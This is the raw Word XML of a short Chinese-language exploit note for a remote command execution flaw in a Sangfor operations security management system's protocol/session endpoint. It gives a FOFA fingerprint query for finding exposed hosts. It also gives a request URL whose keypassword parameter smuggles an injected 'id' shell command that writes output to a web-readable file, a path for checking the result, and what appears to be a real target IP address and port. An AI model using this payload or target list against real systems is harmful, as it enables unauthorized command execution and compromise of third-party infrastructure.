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0A5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深信服运维安全管理系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol/session 远程命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF6FDE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19127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FOFA：body="/fort/login" &amp;&amp; header="FORTSESSIONID"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1DB5FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1FD14A"/>
    <w:p w14:paraId="4E8DF52D"/>
    <w:p w14:paraId="777EF73D"/>
    <w:p w14:paraId="08541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5370A20C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B4953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/isomp-protocol/protocol/session?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keyPath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ssh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keypassword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123456%27%3Bid+%3E%20/usr/local/tomcat/webapps/fort/trust/version/T1.txt;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sshd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21D77A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026DBAA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386CAE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575C288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20136C8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2E794C8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25FCD78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D6CBED"/>
    <w:p w14:paraId="43D3224C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F4A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</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>验证路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6BE30C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E22438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/fort/trust/version/T1.txt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23E92B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115.231.7.254:1443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674B8C9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24236A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13BA5"/>
    <w:rsid w:val="0AA74DF8"/>
    <w:rsid w:val="13C04296"/>
    <w:rsid w:val="1FFB7A71"/>
    <w:rsid w:val="30EB518F"/>
    <w:rsid w:val="465A6FD2"/>
    <w:rsid w:val="4C0E6189"/>
    <w:rsid w:val="75C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648</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>675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2025-07-02T14:08:00Z</dcterms:created>
  <dc:creator>Admin</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:18:04Z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AEA703F120994C90A2B0F475C2B79CE3_12</vt:lpwstr>
  </property>
</Properties>
</file>